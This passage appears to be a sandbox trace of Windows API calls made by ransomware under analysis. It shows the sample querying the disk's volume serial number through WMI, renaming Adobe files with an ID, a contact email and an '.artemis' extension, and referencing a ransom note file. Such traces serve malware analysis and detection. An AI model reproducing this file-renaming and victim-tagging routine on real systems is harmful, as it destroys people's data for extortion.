[2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e508 | out: ppvObject=0x6e4e508*=0x0) returned 0x80004002 [0202.663] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4de64 | out: ppvObject=0x6e4de64*=0x0) returned 0x80004002 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4de14 | out: ppvObject=0x6e4de14*=0x0) returned 0x80004002 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4de20 | out: ppvObject=0x6e4de20*=0x77be28) returned 0x0 [0202.663] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77be28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4de28 | out: pCid=0x6e4de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.664] WbemDefPath:IUnknown:Release (This=0x77be28) returned 0x3 [0202.664] CoGetContextToken (in: pToken=0x6e4de80 | out: pToken=0x6e4de80) returned 0x0 [0202.664] CoGetContextToken (in: pToken=0x6e4de30 | out: pToken=0x6e4de30) returned 0x0 [0202.664] CoGetContextToken (in: pToken=0x6e4e288 | out: pToken=0x6e4e288) returned 0x0 [0202.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e318 | out: ppvObject=0x6e4e318*=0x0) returned 0x80004002 [0202.664] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0202.664] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0202.664] CoGetContextToken (in: pToken=0x6e4ec10 | out: pToken=0x6e4ec10) returned 0x0 [0202.664] CoGetContextToken (in: pToken=0x6e4eb70 | out: pToken=0x6e4eb70) returned 0x0 [0202.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x6e4ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4ec3c | out: ppvObject=0x6e4ec3c*=0x6738770) returned 0x0 [0202.664] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0202.664] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0202.664] WbemDefPath:IWbemPath:SetText (This=0x6738770, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0202.664] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6e4edc0 | out: puCount=0x6e4edc0*=0x2) returned 0x0 [0202.664] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6e4edbc*=0x0, pszText=0x0 | out: puBuffLength=0x6e4edbc*=0xf, pszText=0x0) returned 0x0 [0202.664] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6e4edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.664] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4edc0 | out: ppv=0x6e4edc0*=0x72015c) returned 0x0 [0202.664] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4edb8 | out: pAptType=0x6e4edb8*=1) returned 0x0 [0202.664] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4edbc | out: ppvObject=0x6e4edbc*=0x0) returned 0x80004002 [0202.664] IUnknown:Release (This=0x72015c) returned 0x1 [0202.665] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e9e0 | out: ppv=0x6e4e9e0*=0x672f340) returned 0x0 [0202.665] WbemLocator:IUnknown:QueryInterface (in: This=0x672f340, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4ebf8 | out: ppvObject=0x6e4ebf8*=0x0) returned 0x80004002 [0202.665] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f340, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4ec0c | out: ppvObject=0x6e4ec0c*=0x6736e68) returned 0x0 [0202.665] WbemLocator:IUnknown:Release (This=0x672f340) returned 0x0 [0202.665] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e82c | out: ppvObject=0x6e4e82c*=0x6736e68) returned 0x0 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e7e8 | out: ppvObject=0x6e4e7e8*=0x0) returned 0x80004002 [0202.666] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e144 | out: ppvObject=0x6e4e144*=0x0) returned 0x80004002 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4e0f4 | out: ppvObject=0x6e4e0f4*=0x0) returned 0x80004002 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e100 | out: ppvObject=0x6e4e100*=0x0) returned 0x80004002 [0202.666] CoGetContextToken (in: pToken=0x6e4e160 | out: pToken=0x6e4e160) returned 0x0 [0202.666] CoGetContextToken (in: pToken=0x6e4e110 | out: pToken=0x6e4e110) returned 0x0 [0202.666] CoGetContextToken (in: pToken=0x6e4e568 | out: pToken=0x6e4e568) returned 0x0 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e5f8 | out: ppvObject=0x6e4e5f8*=0x0) returned 0x80004002 [0202.666] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0202.666] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0202.666] CoGetContextToken (in: pToken=0x6e4ebd8 | out: pToken=0x6e4ebd8) returned 0x0 [0202.666] CoGetContextToken (in: pToken=0x6e4eb38 | out: pToken=0x6e4eb38) returned 0x0 [0202.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x6e4ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6e4ec04 | out: ppvObject=0x6e4ec04*=0x6736e68) returned 0x0 [0202.666] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0202.666] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0202.666] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6e4ed9c | out: puCount=0x6e4ed9c*=0x2) returned 0x0 [0202.666] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6e4ed98*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ed98*=0xf, pszText=0x0) returned 0x0 [0202.666] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6e4ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.666] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6e4ec74 | out: ppv=0x6e4ec74*=0x6736ef8) returned 0x0 [0202.667] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736ef8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6e4ed08 | out: ppNamespace=0x6e4ed08*=0x6748314) returned 0x0 [0203.640] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eba4 | out: ppvObject=0x6e4eba4*=0x781db4) returned 0x0 [0203.640] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781db4, pProxy=0x6748314, pAuthnSvc=0x6e4ebf4, pAuthzSvc=0x6e4ebf0, pServerPrincName=0x6e4ebe8, pAuthnLevel=0x6e4ebec, pImpLevel=0x6e4ebdc, pAuthInfo=0x6e4ebe0, pCapabilites=0x6e4ebe4 | out: pAuthnSvc=0x6e4ebf4*=0xa, pAuthzSvc=0x6e4ebf0*=0x0, pServerPrincName=0x6e4ebe8, pAuthnLevel=0x6e4ebec*=0x6, pImpLevel=0x6e4ebdc*=0x2, pAuthInfo=0x6e4ebe0, pCapabilites=0x6e4ebe4*=0x1) returned 0x0 [0203.640] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x1 [0203.640] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb98 | out: ppvObject=0x6e4eb98*=0x781dd4) returned 0x0 [0203.640] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb94 | out: ppvObject=0x6e4eb94*=0x781db4) returned 0x0 [0203.640] WbemLocator:IClientSecurity:SetBlanket (This=0x781db4, pProxy=0x6748314, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0203.641] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x2 [0203.641] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x1 [0203.641] CoTaskMemFree (pv=0x77e0b8) [0203.641] WbemLocator:IUnknown:Release (This=0x6736ef8) returned 0x0 [0203.641] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e794 | out: ppvObject=0x6e4e794*=0x781dd4) returned 0x0 [0203.641] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e750 | out: ppvObject=0x6e4e750*=0x0) returned 0x80004002 [0203.642] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e56c | out: ppvObject=0x6e4e56c*=0x0) returned 0x80004002 [0203.645] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0203.645] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e0ac | out: ppvObject=0x6e4e0ac*=0x0) returned 0x80004002 [0203.771] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4e05c | out: ppvObject=0x6e4e05c*=0x0) returned 0x80004002 [0203.772] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e068 | out: ppvObject=0x6e4e068*=0x781d34) returned 0x0 [0203.773] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781d34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4e070 | out: pCid=0x6e4e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.773] WbemLocator:IUnknown:Release (This=0x781d34) returned 0x3 [0203.773] CoGetContextToken (in: pToken=0x6e4e0c8 | out: pToken=0x6e4e0c8) returned 0x0 [0203.773] CoGetContextToken (in: pToken=0x6e4e4d0 | out: pToken=0x6e4e4d0) returned 0x0 [0203.773] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e560 | out: ppvObject=0x6e4e560*=0x781dbc) returned 0x0 [0203.773] WbemLocator:IRpcOptions:Query (in: This=0x781dbc, pPrx=0x781dd4, dwProperty=2, pdwValue=0x6e4e588 | out: pdwValue=0x6e4e588) returned 0x80004002 [0203.773] WbemLocator:IUnknown:Release (This=0x781dbc) returned 0x3 [0203.773] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0203.773] CoGetContextToken (in: pToken=0x6e4eaa8 | out: pToken=0x6e4eaa8) returned 0x0 [0203.773] CoGetContextToken (in: pToken=0x6e4ea08 | out: pToken=0x6e4ea08) returned 0x0 [0203.773] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x6e4ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6e4ead4 | out: ppvObject=0x6e4ead4*=0x6748314) returned 0x0 [0203.773] WbemLocator:IUnknown:AddRef (This=0x6748314) returned 0x4 [0203.773] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x3 [0203.773] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x2 [0203.773] SysStringLen (param_1=0x0) returned 0x0 [0203.774] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6e4ee6c | out: puCount=0x6e4ee6c*=0x0) returned 0x0 [0203.774] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee68*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee68*=0x20, pszText=0x0) returned 0x0 [0203.774] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.774] CoGetContextToken (in: pToken=0x6e4ead8 | out: pToken=0x6e4ead8) returned 0x0 [0203.774] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0203.774] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e96c | out: ppvObject=0x6e4e96c*=0x781dd4) returned 0x0 [0203.774] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x3 [0203.774] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0203.774] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee70*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee70*=0x20, pszText=0x0) returned 0x0 [0203.774] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.774] IWbemServices:GetObject (in: This=0x6748314, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6e4ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x6e4ee24*=0x673b468, ppCallResult=0x0) returned 0x0 [0204.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6e4ee24 | out: puCount=0x6e4ee24*=0x2) returned 0x0 [0204.086] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6e4ee20*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee20*=0xf, pszText=0x0) returned 0x0 [0204.086] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6e4ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.086] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3485ca8*=0, plFlavor=0x3485cac*=0 | out: pVal=0x6e4ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3485ca8*=8, plFlavor=0x3485cac*=0) returned 0x0 [0204.086] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.086] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.086] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3485ca8*=8, plFlavor=0x3485cac*=0 | out: pVal=0x6e4ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3485ca8*=8, plFlavor=0x3485cac*=0) returned 0x0 [0204.086] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.086] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.086] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4ea28, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0204.087] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6e4ea28, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x69 [0204.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee88) returned 1 [0204.087] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), fInfoLevelId=0x0, lpFileInformation=0x6e4ef04 | out: lpFileInformation=0x6e4ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0x20520b20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x10e3220)) returned 1 [0204.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee84) returned 1 [0204.087] MoveFileW (lpExistingFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0204.088] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpFilePart=0x0) returned 0x3e [0204.088] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpFilePart=0x0) returned 0x3e [0204.088] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0204.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ef2c) returned 1 [0204.088] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6e4efa8 | out: lpFileInformation=0x6e4efa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af94a0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x4af94a0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x4af94a0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0204.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef28) returned 1 [0204.088] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4ea48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpFilePart=0x0) returned 0x3e [0204.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4eef4) returned 1 [0204.088] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), fInfoLevelId=0x0, lpFileInformation=0x348636c | out: lpFileInformation=0x348636c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000)) returned 1 [0204.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4eef0) returned 1 [0204.089] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4e934, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", 